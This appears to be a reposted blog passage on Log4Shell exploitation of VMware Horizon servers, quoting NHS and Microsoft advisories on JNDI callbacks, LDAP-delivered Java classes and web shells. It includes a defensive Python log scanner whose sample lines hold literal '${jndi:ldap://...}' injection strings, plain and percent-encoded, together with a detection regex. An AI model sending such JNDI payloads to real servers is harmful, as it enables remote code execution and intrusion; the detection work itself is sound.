awayvur.blogg.se

Vmware horizon hackers are under active

The Dutch National Cybersecurity Centre (NCSC) recently warned organizations to remain vigilant for possible attacks exploiting the Log4j vulnerability. According to the agency, threat actors will continue to attempt to exploit the Log4Shell flaw in future attacks.


Multiple VMware products, including VMware Horizon products, are impacted by remote code execution vulnerabilities via Apache Log4j (CVE-2021-44228, CVE-2021-45046). In an email to Bleeping Computer today, VMware said they are strongly urging customers to patch their Horizon servers to defend against these active attacks.

Upon exploiting the Log4j flaws, threat actors deploy custom web shells into the VM Blast Secure Gateway service to gain access to the networks of target organizations. Once a web shell is installed, threat actors can use it to carry out a broad range of malicious activities, such as data exfiltration or deployment of ransomware.

“An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks,” reads the security advisory published by NHS. “The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface™ (JNDI) via Log4Shell payloads to call back to malicious infrastructure. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”
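The JNDI callback step described in the NHS advisory can show up in web or proxy access logs when the lookup string arrives in a logged field. The following script is an added example, not code from the advisory, VMware or the original post: it scans access-log lines for plain and percent-encoded JNDI lookups and extracts the callback endpoint for triage. The log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Captures scheme, host and optional port of the callback in a JNDI lookup.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)

def fully_unquote(text, max_rounds=3):
    """Percent-decode repeatedly so single- and double-encoded lookups both match."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_jndi_callbacks(log_lines):
    """Return one finding per log line carrying a JNDI lookup (plain or percent-encoded).

    Nested-lookup obfuscation is out of scope here, so no hit does not mean clean.
    """
    findings = []
    for lineno, line in enumerate(log_lines, start=1):
        match = JNDI_RE.search(fully_unquote(line))
        if match:
            findings.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],  # assumes client IP is the first field
                "scheme": match["scheme"].lower(),
                "callback": match["host"].lower(),
                "port": int(match["port"]) if match["port"] else None,
            })
    return findings

# Constructed sample lines (documentation IP ranges, .invalid hosts); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Jan/2022:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.23 - - [11/Jan/2022:09:15:40 +0000] "GET /?x=${jndi:ldap://callback.example.invalid:1389/a} HTTP/1.1" 404 0',
    '198.51.100.23 - - [11/Jan/2022:09:15:44 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fa%7D HTTP/1.1" 404 0',
    '192.0.2.55 - - [11/Jan/2022:09:20:01 +0000] "GET /?q=%2524%257BJNDI%253ALDAP%253A%252F%252Fcb2.example.invalid%253A389%252Fb%257D HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for finding in find_jndi_callbacks(SAMPLE_LOG):
        print(finding)
```

Hosts and ports extracted this way can be checked against outbound firewall or DNS logs to see whether the server actually made the callback.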


The security team at the UK National Health Service (NHS) also announced that it had spotted threat actors exploiting the Log4Shell vulnerability to hack VMware Horizon servers and install web shells.

Microsoft Security Intelligence, January 11, 2022: “We have observed a China-based ransomware operator that we’re tracking as DEV-0401 exploiting the CVE-2021-44228 vulnerability in Log4j 2 (aka #log4shell) targeting internet-facing systems running VMware Horizon.”











